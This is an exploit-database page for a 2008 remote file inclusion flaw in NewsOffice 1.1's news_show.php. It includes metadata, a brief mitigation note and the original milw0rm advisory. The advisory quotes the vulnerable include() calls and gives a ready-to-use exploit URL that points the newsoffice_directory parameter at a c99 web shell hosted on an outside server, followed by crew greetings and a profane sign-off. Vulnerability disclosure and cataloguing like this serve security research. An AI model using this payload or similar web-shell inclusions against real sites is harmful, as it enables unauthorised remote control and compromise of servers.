header-logo
Suggest Exploit
vendor:
NewsOffice
by:
RoMaNcYxHaCkEr
8.8
CVSS
HIGH
Remote File Include
98
CWE
Product Name: NewsOffice
Affected Version From: 1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:newanz:newsoffice
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

NewsOffice 1.1 Remote File Include Vulnerability

The vulnerability exists in the news_show.php file of NewsOffice 1.1, which allows an attacker to include a remote file via the newsoffice_directory parameter. The same vulnerability exists in version 1.0 as well.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file include statement.
Source

Exploit-DB raw data:

-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : NewsOffice 1.1 Remote File Include Vulnerabilitiy

# Download From : http://www.newanz.com/applications/NewsOffice/?page=download

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  WwW.4RxH.CoM            

+======================================================================================================================+

# Vulne Code In File news_show.php In Different Lines :

include($newsoffice_directory."config.php");
include($newsoffice_directory."news_data.php");
include($newsoffice_directory."template.php");

# Exploit :

http://WwW.4RxH.CoM/NewsOffice/news_show.php?newsoffice_directory=http://rxh.freehostia.com/shells/c99in.txt?

Also The Version 1.0 Is Infected In Same File

That,s It,s

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum

# For Contact : RxH@HoTMaiL.iT

# Fuck Own Life  :( 

-==========================================[ ViVa Islam + YeMeN ]====================================-

# milw0rm.com [2008-04-11]